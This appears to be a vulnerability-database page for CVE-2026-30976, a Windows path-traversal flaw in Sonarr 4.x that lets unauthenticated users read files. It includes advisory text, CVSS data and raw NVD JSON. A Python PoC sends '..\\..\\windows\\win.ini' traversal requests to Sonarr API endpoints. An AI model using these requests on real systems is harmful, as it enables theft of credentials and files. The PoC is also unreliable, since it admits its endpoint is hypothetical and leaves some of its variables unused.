Security Vulnerability Report
CVE-2026-30976 CVSS 8.6 HIGH

CVE-2026-30976

Published: 2026-03-25 21:16:42
Last Modified: 2026-04-09 19:44:38

Description

Sonarr is a PVR for Usenet and BitTorrent users. In versions on the 4.x branch prior to 4.0.17.2950, an unauthenticated remote attacker can potentially read any file readable by the Sonarr process. These include application configuration files (containing API keys and database credentials), Windows system files, and any user-accessible files on the same drive. This issue only impacts Windows systems; macOS and Linux are unaffected. Files returned from the API were not limited to the directory on disk they were intended to be served from. This problem has been patched in 4.0.17.2950 in the nightly/develop branch or 4.0.17.2952 for stable/main releases. It's possible to work around the issue by only hosting Sonarr on a secure internal network and accessing it via VPN, Tailscale or a similar solution from outside that network.

CVSS Details

CVSS Score
8.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:sonarr:sonarr:*:*:*:*:*:*:*:* - VULNERABLE
Sonarr 4.x < 4.0.17.2950
Sonarr 4.x < 4.0.17.2952 (Stable)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target URL (Sonarr instance)
target_url = "http://<target-ip>:8989/api/v3/diskSpace?path=../../.."

# Note: The exact vulnerable endpoint might vary based on specific API implementation.
# This PoC demonstrates the concept of path traversal to read files.
# In a real scenario, the attacker would manipulate the 'path' or similar parameter.

# Example payload to read Windows win.ini file
# Usually Sonarr runs on Windows as a service.
payload = "C:\\Windows\\win.ini"

# Constructing a hypothetical malicious request
# Assuming an endpoint like /api/file exists or parameters are injectable
vuln_endpoint = "http://<target-ip>:8989/api/v3/rootfolder"
params = {
    # Attempting to traverse out of the application root
    "path": "..\\..\\..\\..\\windows\\win.ini"
}

try:
    response = requests.get(vuln_endpoint, params=params)
    if response.status_code == 200:
        print("[+] Potential vulnerability confirmed!")
        print("Response content:")
        print(response.text)
    else:
        print("[-] Exploit failed or endpoint not found.")
except Exception as e:
    print(f"Error: {e}")

References

https://github.com/Sonarr/Sonarr/releases/tag/v4.0.17.2950 (Release Notes)
https://github.com/Sonarr/Sonarr/releases/tag/v4.0.17.2952 (Release Notes)
https://github.com/Sonarr/Sonarr/security/advisories/GHSA-h393-v5hm-6h8f (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-30976", "sourceIdentifier": "[email protected]", "published": "2026-03-25T21:16:41.623", "lastModified": "2026-04-09T19:44:38.000", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Sonarr is a PVR for Usenet and BitTorrent users. In versions on the 4.x branch prior to 4.0.17.2950, an unauthenticated remote attacker can potentially read any file readable by the Sonarr process. These include application configuration files (containing API keys and database credentials), Windows system files, and any user-accessible files on the same drive This issue only impacts Windows systems; macOS and Linux are unaffected. Files returned from the API were not limited to the directory on disk they were intended to be served from. This problem has been patched in 4.0.17.2950 in the nightly/develop branch or 4.0.17.2952 for stable/main releases. It's possible to work around the issue by only hosting Sonarr on a secure internal network and accessing it via VPN, Tailscale or similar solution outside that network."}, {"lang": "es", "value": "Sonarr es un PVR para usuarios de Usenet y BitTorrent. En versiones de la rama 4.x anteriores a la 4.0.17.2950, un atacante remoto no autenticado puede leer potencialmente cualquier archivo legible por el proceso de Sonarr. Estos incluyen archivos de configuración de la aplicación (que contienen claves de API y credenciales de base de datos), archivos del sistema de Windows y cualquier archivo accesible por el usuario en la misma unidad. Este problema solo afecta a los sistemas Windows; macOS y Linux no se ven afectados. Los archivos devueltos desde la API no estaban limitados al directorio en disco desde el que se suponía que debían servirse. Este problema ha sido parcheado en la versión 4.0.17.2950 en la rama nightly/develop o en la 4.0.17.2952 para las versiones stable/main. Es posible solucionar el problema alojando Sonarr únicamente en una red interna segura y accediéndolo a través de VPN, Tailscale o una solución similar fuera de esa red."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sonarr:sonarr:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.0.741", "versionEndExcluding": "4.0.17.2950", "matchCriteriaId": "15A94C78-5072-4BB2-9E51-622ECBB2650B"}]}]}], "references": [{"url": "https://github.com/Sonarr/Sonarr/releases/tag/v4.0.17.2950", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/Sonarr/Sonarr/releases/tag/v4.0.17.2952", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/Sonarr/Sonarr/security/advisories/GHSA-h393-v5hm-6h8f", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}